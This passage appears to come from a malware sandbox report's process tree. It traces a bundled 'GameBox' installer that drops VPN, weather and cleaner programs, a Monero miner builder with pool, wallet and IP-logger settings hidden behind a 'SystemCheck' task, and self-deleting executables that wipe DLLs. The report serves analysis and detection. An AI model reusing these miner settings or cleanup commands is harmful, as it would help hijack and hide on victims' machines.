                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:8608
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:8996
                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4436
                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:3896
                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:2148
                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4484
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-2VJQK.tmp\WEATHER Manager.tmp
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-2VJQK.tmp\WEATHER Manager.tmp" /SL5="$10354,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5276
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-J5HF7.tmp\Setup.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-J5HF7.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    PID:6292
                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-J5HF7.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-J5HF7.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472577 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:7996
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RD88P.tmp\VPN.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RD88P.tmp\VPN.tmp" /SL5="$10368,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    PID:5448
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AGN56.tmp\Setup.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AGN56.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:7868
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-4EHDH.tmp\Setup.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-4EHDH.tmp\Setup.tmp" /SL5="$3063C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-AGN56.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                          PID:2156
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:7528
                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                tapinstall.exe remove tap0901
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                PID:8748
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:7344
                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                  tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                  PID:8928
                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                PID:6364
                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                PID:8668
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-O88FJ.tmp\Stats.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-O88FJ.tmp\Stats.tmp" /SL5="$10334,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                          PID:4748
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-PPOGD.tmp\builder.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-PPOGD.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                            PID:1256
                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          PID:5844
                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:2000
                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          PID:5280
                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding FE5286C798788B60D82112531B7759A6 C
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:3328
                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding D9C2B07B006D36551E78B10982C8FB9B
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:8688
                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding C91581C3807D22983AE6DD4B59593291 C
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:8780
                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 1763E53944CAB2F4B111F6267375C1E0 C
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:5636
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            PID:7360
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                              PID:6240
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                PID:4624
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ff87f4adec0,0x7ff87f4aded0,0x7ff87f4adee0
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:8220
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,10013208840608360586,2687422445739929394,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_1745884260" --mojo-platform-channel-handle=1712 /prefetch:8
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                    PID:7460
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1648,10013208840608360586,2687422445739929394,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_1745884260" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:2
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:4844
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,10013208840608360586,2687422445739929394,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_1745884260" --mojo-platform-channel-handle=2172 /prefetch:8
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:9496
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,10013208840608360586,2687422445739929394,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_1745884260" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2604 /prefetch:1
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                        PID:640
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,10013208840608360586,2687422445739929394,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_1745884260" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2284 /prefetch:1
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                        PID:9756
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,10013208840608360586,2687422445739929394,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_1745884260" --mojo-platform-channel-handle=3112 /prefetch:8
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:10100
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1648,10013208840608360586,2687422445739929394,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_1745884260" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2620 /prefetch:2
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:5504
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,10013208840608360586,2687422445739929394,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4624_1745884260" --mojo-platform-channel-handle=3588 /prefetch:8
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:9640
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_C9D0.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:7452
                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                        PID:8932
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:8960
                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                        PID:6672
                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                          DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{14989610-a20b-6b45-891b-26253c8f5d6b}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:7788
                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                          DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000138"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          PID:8976
                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:6152
                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:6436
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                          PID:6448
                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:5072
                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:8344
                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                            MaskVPNUpdate.exe /silent
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                            PID:9380
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:1384
                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          PID:6232
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:6152
                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:9028
                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                          PID:8068
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\84D2.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\84D2.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:7848
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\91F2.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\91F2.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:7644
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AAFA.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\AAFA.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            PID:5384
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D5E3.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D5E3.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            PID:9180
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F6E9.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F6E9.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                            PID:9324
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im F6E9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F6E9.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:10024
                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                  taskkill /im F6E9.exe /f
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:1672
                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:8024
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\CD.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\CD.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:9488
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CD.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\CD.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                PID:9724
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im CD.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CD.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5756
